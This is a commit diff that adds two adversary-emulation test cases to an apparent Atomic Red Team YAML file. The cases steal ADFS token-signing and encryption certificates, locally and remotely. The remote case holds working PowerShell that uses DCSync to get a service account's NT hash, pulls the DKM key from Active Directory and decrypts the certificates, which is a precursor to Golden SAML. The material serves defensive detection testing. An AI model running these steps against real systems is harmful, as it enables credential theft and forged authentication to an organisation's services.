Merge pull request #1605 from piaconsigny/pr-adfs-certificates-theft
T1552.004: ADFS Certificates theft
This commit is contained in:
Adam Mashinchi
@@ -103,3 +103,99 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
rm -rf #{output_folder}
|
||||
name: sh
|
||||
- name: ADFS token signing and encryption certificates theft - Local
|
||||
auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
|
||||
description: |
|
||||
Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
|
||||
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
AADInternals module must be installed.
|
||||
prereq_command: |
|
||||
if (Get-Module AADInternals) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Install-Module -Name AADInternals -Force
|
||||
executor:
|
||||
command: |
|
||||
Import-Module AADInternals -Force
|
||||
Export-AADIntADFSCertificates
|
||||
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
|
||||
Write-Host "`nCertificates retrieved successfully"
|
||||
cleanup_command: |
|
||||
Remove-Item -Path ".\ADFS_encryption.pfx"
|
||||
Remove-Item -Path ".\ADFS_signing.pfx"
|
||||
name: powershell
|
||||
- name: ADFS token signing and encryption certificates theft - Remote
|
||||
auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
|
||||
description: |
|
||||
Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
|
||||
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
adfs_service_account_name:
|
||||
description: Name of the ADFS service account
|
||||
type: String
|
||||
default: "adfs_svc"
|
||||
replication_user:
|
||||
description: Username with replication rights. It can be the Domain Admin running the script
|
||||
type: String
|
||||
default: "Administrator"
|
||||
replication_password:
|
||||
description: Password of replication_username
|
||||
type: String
|
||||
default: "ReallyStrongPassword"
|
||||
adfs_server_name:
|
||||
description: Name of an ADFS server
|
||||
type: String
|
||||
default: "sts.contoso.com"
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
AADInternals and ActiveDirectory modules must be installed.
|
||||
prereq_command: |
|
||||
if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
|
||||
get_prereq_command: |
|
||||
Install-Module -Name AADInternals -Force
|
||||
executor:
|
||||
command: |
|
||||
Import-Module ActiveDirectory -Force
|
||||
Import-Module AADInternals -Force | Out-Null
|
||||
#Get Configuration
|
||||
$dcServerName = (Get-ADDomainController).HostName
|
||||
$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
|
||||
$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
|
||||
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
|
||||
# use DCSync to fetch the ADFS service account's NT hash
|
||||
$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
|
||||
$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
|
||||
# Get certificates decryption key
|
||||
$Configuration = [xml]$ADFSConfig
|
||||
$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
|
||||
$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
|
||||
$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
|
||||
$base = "LDAP://CN=$group,$container,$parent"
|
||||
$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
|
||||
$ADSearch.Filter = '(name=CryptoPolicy)'
|
||||
$ADSearch.PropertiesToLoad.Clear()
|
||||
$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
|
||||
$aduser = $ADSearch.FindOne()
|
||||
$keyObjectGuid = $ADUser.Properties["displayName"]
|
||||
$ADSearch.PropertiesToLoad.Clear()
|
||||
$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
|
||||
$ADSearch.Filter="(l=$keyObjectGuid)"
|
||||
$aduser=$ADSearch.FindOne()
|
||||
$key=[byte[]]$aduser.Properties["thumbnailphoto"][0]
|
||||
# Get encrypted certificates from configuration and decrypt them
|
||||
Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
|
||||
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
|
||||
Write-Host "`nCertificates retrieved successfully"
|
||||
cleanup_command: |
|
||||
Remove-Item -Path ".\ADFS_encryption.pfx"
|
||||
Remove-Item -Path ".\ADFS_signing.pfx"
|
||||
name: powershell
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user